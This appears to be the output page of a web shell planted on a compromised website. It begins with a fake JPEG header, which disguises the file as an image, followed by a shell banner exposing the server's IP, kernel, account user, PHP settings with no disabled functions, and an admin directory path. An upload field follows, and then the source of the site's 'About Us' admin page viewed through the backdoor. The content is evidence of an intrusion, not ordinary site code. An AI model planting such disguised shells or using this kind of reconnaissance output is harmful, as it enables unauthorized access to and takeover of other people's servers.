���� JFIF fdasasfas213sdaf
Server IP : 147.79.69.148 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/saumasale.in/public_html/admin/ |
Upload File : |
<?php session_start(); if(empty($_SESSION['logged_in_id'])){ header('Location:login.php'); } include_once('includes/db.php'); $ob = new database(); include('function.php'); head(); ?> <div class="content-wrapper"> <!-- Main content --> <section class="content mt-2"> <div class="container-fluid"> <div class="row"> <div class="col-12"> <div class="card"> <div class="card-header"> <h2 class="card-title">About Us</h2> </div> <!-- /.card-header --> <div class="card-body"> <table id="example3" class="table table-bordered table-striped"> <thead> <tr> <th>About Us</th> <th style="min-width: 170px;">Action</th> </tr> </thead> <tbody id="show_about" class="show_about"></tbody> </table> </div> <!-- /.card-body --> </div> <!-- /.card --> </div> <!-- /.col --> </div> <!-- /.row --> </div> <!-- /.container-fluid --> </section> <!-- /.content --> </div> <div class="modal fade mt-3" id="myabout"> <div class="modal-dialog modal-lg"> <div class="modal-content"> <div class="modal-header mymodel-header"> <h4 class="modal-title mymodel-title">Edit About Us</h4> <button type="button" class="mymodel-button close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="about_edit"></div> </div> </div> </div> <?php foter(); ?>